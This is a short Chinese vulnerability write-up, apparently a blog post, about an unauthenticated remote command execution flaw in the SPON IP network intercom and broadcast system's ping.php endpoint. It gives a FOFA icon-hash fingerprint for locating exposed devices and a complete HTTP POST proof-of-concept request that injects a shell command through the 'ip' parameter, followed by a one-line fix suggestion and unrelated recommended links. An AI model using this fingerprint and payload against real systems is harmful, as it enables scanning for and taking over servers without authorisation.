世邦 IP网络对讲广播系统 ping.php接口存在远程命令执行漏洞

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统ping.php接口存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行高危命令获取服务器权限。

指纹识别

fofa:

python 复制代码
icon_hash="-1830859634"

漏洞利用

poc:

python 复制代码
POST /php/ping.php HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

jsondata%5Btype%5D=123&jsondata%5Bip%5D=whoami

执行whoami命令

修复建议

联系软件厂商更新至最新安全版本

相关推荐
亿坊电商15 分钟前
物联网领域中PHP框架的最佳选择有哪些?
物联网·struts·php
wuzuyu3651 小时前
用php做一个简易的路由
php·路由
风中的微尘1 小时前
39.网络流入门
开发语言·网络·c++·算法
lubiii_1 小时前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全
hsjkdhs1 小时前
网络编程之UDP广播与粘包问题
网络·网络协议·udp
yzx9910133 小时前
接口协议全解析:从HTTP到gRPC,如何选择适合你的通信方案?
网络·人工智能·网络协议·flask·pygame
你的人类朋友4 小时前
🔒什么是HMAC
后端·安全·程序员
程思扬4 小时前
利用JSONCrack与cpolar提升数据可视化及跨团队协作效率
网络·人工智能·经验分享·docker·信息可视化·容器·架构
阿部多瑞 ABU5 小时前
《基于国产Linux的机房终端安全重构方案》
linux·安全
init_23615 小时前
isis dis选举
网络